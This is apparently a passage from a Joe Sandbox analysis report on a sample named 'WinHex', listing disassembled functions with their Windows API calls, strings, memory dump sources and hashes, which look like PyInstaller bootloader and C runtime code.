                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                        • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                                                                                        • API String ID: 1662231829-3498232454
                                                                                                                        • Opcode ID: e82e75a9301f2c01be817318613aadd6cb56ce3046e43f6970fb0f78f3b425c1
                                                                                                                        • Instruction ID: 523b7543eee4f4e76f9acc64cd21b434eba524f5daeb370ab24bc8817fb6d09b
                                                                                                                        • Opcode Fuzzy Hash: e82e75a9301f2c01be817318613aadd6cb56ce3046e43f6970fb0f78f3b425c1
                                                                                                                        • Instruction Fuzzy Hash: 0531A315B1CB8380FA64BF21A5553BADA51AF98FE4FC40031DA0E427DEEE2EE5048720
                                                                                                                        Function 00007FF7C5BD7A30 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 68COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32 ref: 00007FF7C5BD7A6A
                                                                                                                          • Part of subcall function 00007FF7C5BD2620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7C5BD7744,?,?,?,?,?,?,?,?,?,?,?,00007FF7C5BD101D), ref: 00007FF7C5BD2654
                                                                                                                          • Part of subcall function 00007FF7C5BD2620: MessageBoxW.USER32 ref: 00007FF7C5BD272C
                                                                                                                        • MultiByteToWideChar.KERNEL32 ref: 00007FF7C5BD7AF0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                        • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                        • API String ID: 3723044601-876015163
                                                                                                                        • Opcode ID: a067ef3949ab1c43b8cad70a8c207a907739284b21da8d2c9820fdf83144c31f
                                                                                                                        • Instruction ID: 4a57df5e8d2a3bc089ecdbe23bd923a13ba6e44a2533a8d05d19e07d516b3b32
                                                                                                                        • Opcode Fuzzy Hash: a067ef3949ab1c43b8cad70a8c207a907739284b21da8d2c9820fdf83144c31f
                                                                                                                        • Instruction Fuzzy Hash: FD218726B0CA4241EB10EF19F400169EB61FF94BE4F984631DB4C83B69EF2EE5418710
                                                                                                                        Function 00007FF7C5BEA620 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF7C5BF2433,?,?,?,00007FF7C5BECB8C,?,?,00000000,00007FF7C5BE3A5F,?,?,?,00007FF7C5BE9313), ref: 00007FF7C5BEA62F
                                                                                                                        • FlsGetValue.KERNEL32(?,?,?,00007FF7C5BF2433,?,?,?,00007FF7C5BECB8C,?,?,00000000,00007FF7C5BE3A5F,?,?,?,00007FF7C5BE9313), ref: 00007FF7C5BEA644
                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7C5BF2433,?,?,?,00007FF7C5BECB8C,?,?,00000000,00007FF7C5BE3A5F,?,?,?,00007FF7C5BE9313), ref: 00007FF7C5BEA665
                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7C5BF2433,?,?,?,00007FF7C5BECB8C,?,?,00000000,00007FF7C5BE3A5F,?,?,?,00007FF7C5BE9313), ref: 00007FF7C5BEA692
                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7C5BF2433,?,?,?,00007FF7C5BECB8C,?,?,00000000,00007FF7C5BE3A5F,?,?,?,00007FF7C5BE9313), ref: 00007FF7C5BEA6A3
                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7C5BF2433,?,?,?,00007FF7C5BECB8C,?,?,00000000,00007FF7C5BE3A5F,?,?,?,00007FF7C5BE9313), ref: 00007FF7C5BEA6B4
                                                                                                                        • SetLastError.KERNEL32(?,?,?,00007FF7C5BF2433,?,?,?,00007FF7C5BECB8C,?,?,00000000,00007FF7C5BE3A5F,?,?,?,00007FF7C5BE9313), ref: 00007FF7C5BEA6CF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Value$ErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2506987500-0
                                                                                                                        • Opcode ID: 6fa1fab48d66e1463309dc109adf4585d75bfd82a6fbadce2d7c74c597cc3b40
                                                                                                                        • Instruction ID: 98af36a7b9db39c238edf34f90c34e35a92c5ef00d3ef53918dfe676c41b7080
                                                                                                                        • Opcode Fuzzy Hash: 6fa1fab48d66e1463309dc109adf4585d75bfd82a6fbadce2d7c74c597cc3b40
                                                                                                                        • Instruction Fuzzy Hash: 0D216221E0C60346F9687F215A59179EA459F87FB0F984734E93E0B6D6DEAEB4404331
                                                                                                                        Function 00007FF7C5BF706C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                        • String ID: CONOUT$
                                                                                                                        • API String ID: 3230265001-3130406586
                                                                                                                        • Opcode ID: 1a41989b306c04176fbb8ce5d038fb17b2eb18ca34d01c5ff4cda60dd112554e
                                                                                                                        • Instruction ID: e47abca775b4c8961f52b902be5fbd9b3e93f3236f2469dfb3cb9f3636fde9c6
                                                                                                                        • Opcode Fuzzy Hash: 1a41989b306c04176fbb8ce5d038fb17b2eb18ca34d01c5ff4cda60dd112554e
                                                                                                                        • Instruction Fuzzy Hash: 9911D326B18A4286E350AF56E854329F7A0FB88FF4F940334EA1D87794CF7DD5048710
                                                                                                                        Function 00007FF7C5BEA798 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF7C5BE444D,?,?,?,?,00007FF7C5BEDDA7,?,?,00000000,00007FF7C5BEA8B6,?,?,?), ref: 00007FF7C5BEA7A7
                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7C5BE444D,?,?,?,?,00007FF7C5BEDDA7,?,?,00000000,00007FF7C5BEA8B6,?,?,?), ref: 00007FF7C5BEA7DD
                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7C5BE444D,?,?,?,?,00007FF7C5BEDDA7,?,?,00000000,00007FF7C5BEA8B6,?,?,?), ref: 00007FF7C5BEA80A
                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7C5BE444D,?,?,?,?,00007FF7C5BEDDA7,?,?,00000000,00007FF7C5BEA8B6,?,?,?), ref: 00007FF7C5BEA81B
                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7C5BE444D,?,?,?,?,00007FF7C5BEDDA7,?,?,00000000,00007FF7C5BEA8B6,?,?,?), ref: 00007FF7C5BEA82C
                                                                                                                        • SetLastError.KERNEL32(?,?,?,00007FF7C5BE444D,?,?,?,?,00007FF7C5BEDDA7,?,?,00000000,00007FF7C5BEA8B6,?,?,?), ref: 00007FF7C5BEA847
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Value$ErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2506987500-0
                                                                                                                        • Opcode ID: f18d8f431814927885b9c894ece884b545559122ce24857c2491552e22e71327
                                                                                                                        • Instruction ID: 1c55387286418c22b073684a9003751397b9cf223fa5cb2bebbd8aae0c78a055
                                                                                                                        • Opcode Fuzzy Hash: f18d8f431814927885b9c894ece884b545559122ce24857c2491552e22e71327
                                                                                                                        • Instruction Fuzzy Hash: 21119320E0C64242F568BF315945079DA5A9F85FB0FD84334E92E076C6DEAEF8418331
                                                                                                                        Function 00007FF7C5BDC8A8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                        • String ID: csm$f
                                                                                                                        • API String ID: 2395640692-629598281
                                                                                                                        • Opcode ID: 42fbbb83cedbe148bfcc1de87ea3e914151e174f0a46670c6939306692d2d31c
                                                                                                                        • Instruction ID: 59e2ccacd38ee49648641e2ed76c46cfddafa89e7f2c47b2f4e2ce5022cfee58
                                                                                                                        • Opcode Fuzzy Hash: 42fbbb83cedbe148bfcc1de87ea3e914151e174f0a46670c6939306692d2d31c
                                                                                                                        • Instruction Fuzzy Hash: 5B51D132B196028ADB15EF15E400A29BB95FB64FA8F958130DA4E4778CDF3EF941C714
                                                                                                                        Function 00007FF7C5BD2240 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                        • String ID: Unhandled exception in script
                                                                                                                        • API String ID: 3081866767-2699770090
                                                                                                                        • Opcode ID: 01a0bb9e98a22bc39d92f1d9306349b6b95e7735addeeef39cbdf51254e5f23a
                                                                                                                        • Instruction ID: 455f6f1fd9992619877635c9b5cf55afe3d391eb5a007edefaea4d181e37c467
                                                                                                                        • Opcode Fuzzy Hash: 01a0bb9e98a22bc39d92f1d9306349b6b95e7735addeeef39cbdf51254e5f23a
                                                                                                                        • Instruction Fuzzy Hash: A2316F36A08A8289EB24EF61E8551F9E760FF88BA4F840135EE4D4BB5ADF3DD145C710
                                                                                                                        Function 00007FF7C5BD2620 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7C5BD7744,?,?,?,?,?,?,?,?,?,?,?,00007FF7C5BD101D), ref: 00007FF7C5BD2654
                                                                                                                          • Part of subcall function 00007FF7C5BD74B0: GetLastError.KERNEL32(00000000,00007FF7C5BD26A0), ref: 00007FF7C5BD74D7
                                                                                                                          • Part of subcall function 00007FF7C5BD74B0: FormatMessageW.KERNEL32(00000000,00007FF7C5BD26A0), ref: 00007FF7C5BD7506
                                                                                                                          • Part of subcall function 00007FF7C5BD7A30: MultiByteToWideChar.KERNEL32 ref: 00007FF7C5BD7A6A
                                                                                                                        • MessageBoxW.USER32 ref: 00007FF7C5BD272C
                                                                                                                        • MessageBoxA.USER32 ref: 00007FF7C5BD2748
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$ErrorLast$ByteCharFormatMultiWide
                                                                                                                        • String ID: %s%s: %s$Fatal error detected
                                                                                                                        • API String ID: 2806210788-2410924014
                                                                                                                        • Opcode ID: bd2085b38ade222d48c53e4b242a54a19eedc60d0d0276a39b8304b5fd6b5430
                                                                                                                        • Instruction ID: b0cabf06d3d484c5dffae582c90e1f9587bdc9e619bcd0818e5a2fd2fda1b071
                                                                                                                        • Opcode Fuzzy Hash: bd2085b38ade222d48c53e4b242a54a19eedc60d0d0276a39b8304b5fd6b5430
                                                                                                                        • Instruction Fuzzy Hash: 62317272628A8281E634AF10E4517EAE764FF84B94FC04136E68D07A9DDF3DD305CB50
                                                                                                                        Function 00007FF7C5BE88E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                        • Opcode ID: 611779d08fafb8db9f6fab045cd04065641a8af0ffd245d6ff06f44facfa83ea
                                                                                                                        • Instruction ID: 1cbdb009b0698f0c680fe1002522ae9f64ede61d89249732912b3ea4d7f1fa0b
                                                                                                                        • Opcode Fuzzy Hash: 611779d08fafb8db9f6fab045cd04065641a8af0ffd245d6ff06f44facfa83ea
                                                                                                                        • Instruction Fuzzy Hash: B1F06269A19B0281EB24AF24E855739DB20EF85FB1FD81735D66E456F4CF2ED049C320
                                                                                                                        Function 00007FF7C5BF87A4 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _set_statfp
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1156100317-0
                                                                                                                        • Opcode ID: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
                                                                                                                        • Instruction ID: 15b3da62ab77159bdaffd5b7aacec11f6877bec6387d04cbcbb517dfd8ac5064
                                                                                                                        • Opcode Fuzzy Hash: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
                                                                                                                        • Instruction Fuzzy Hash: 1511916AE18A0715F7943D28F446375AC416F58BB4F940734F96F1AAD6CF2EEC414270
                                                                                                                        Function 00007FF7C5BEA860 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FlsGetValue.KERNEL32(?,?,?,00007FF7C5BE9A73,?,?,00000000,00007FF7C5BE9D0E,?,?,?,?,?,00007FF7C5BE21EC), ref: 00007FF7C5BEA87F
                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7C5BE9A73,?,?,00000000,00007FF7C5BE9D0E,?,?,?,?,?,00007FF7C5BE21EC), ref: 00007FF7C5BEA89E
                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7C5BE9A73,?,?,00000000,00007FF7C5BE9D0E,?,?,?,?,?,00007FF7C5BE21EC), ref: 00007FF7C5BEA8C6
                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7C5BE9A73,?,?,00000000,00007FF7C5BE9D0E,?,?,?,?,?,00007FF7C5BE21EC), ref: 00007FF7C5BEA8D7
                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7C5BE9A73,?,?,00000000,00007FF7C5BE9D0E,?,?,?,?,?,00007FF7C5BE21EC), ref: 00007FF7C5BEA8E8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Value
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3702945584-0
                                                                                                                        • Opcode ID: b230e00eb3a4a963830e94931d1c566e9f2167cfa2cfe95f454d85ffeb99a2ab
                                                                                                                        • Instruction ID: 8525f3656c834147d5f6f437215a10e8a94c22a083d7543a5fa9cef1c1a0c955
                                                                                                                        • Opcode Fuzzy Hash: b230e00eb3a4a963830e94931d1c566e9f2167cfa2cfe95f454d85ffeb99a2ab
                                                                                                                        • Instruction Fuzzy Hash: DF117F20E0C64202FA58BF265995179DA499F85FB0F9C4334F93E0A6C6DEAEB4428631
                                                                                                                        Function 00007FF7C5BEA6F4 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7C5BF2433,?,?,?,00007FF7C5BECB8C,?,?,00000000,00007FF7C5BE3A5F), ref: 00007FF7C5BEA705
                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7C5BF2433,?,?,?,00007FF7C5BECB8C,?,?,00000000,00007FF7C5BE3A5F), ref: 00007FF7C5BEA724
                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7C5BF2433,?,?,?,00007FF7C5BECB8C,?,?,00000000,00007FF7C5BE3A5F), ref: 00007FF7C5BEA74C
                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7C5BF2433,?,?,?,00007FF7C5BECB8C,?,?,00000000,00007FF7C5BE3A5F), ref: 00007FF7C5BEA75D
                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7C5BF2433,?,?,?,00007FF7C5BECB8C,?,?,00000000,00007FF7C5BE3A5F), ref: 00007FF7C5BEA76E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Value
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3702945584-0
                                                                                                                        • Opcode ID: 2ba98259ac8f671f7b11ef4b4b97e12d4d2c3255f6215eff0bd660afad52eb11
                                                                                                                        • Instruction ID: ef5889f8795e280fada2348395aa94ce0ac2b357d9fbf81b07bf6afdee4cd736
                                                                                                                        • Opcode Fuzzy Hash: 2ba98259ac8f671f7b11ef4b4b97e12d4d2c3255f6215eff0bd660afad52eb11
                                                                                                                        • Instruction Fuzzy Hash: E8110024E0C20342F969BF3148561799A9A8F86F70FDC4734E93E0A2D2DDAEB4414271
                                                                                                                        Function 00007FF7C5BEF198 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                        • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                        • API String ID: 3215553584-1196891531
                                                                                                                        • Opcode ID: e657aeb740c2ac826b77e83addb2cc82262a2e6e3b5be7210a8d66ad85871f1f
                                                                                                                        • Instruction ID: 7aaa28f79303f533d425e6b59b8aef678dd719b862a28fbd25c19b427d7eac9b
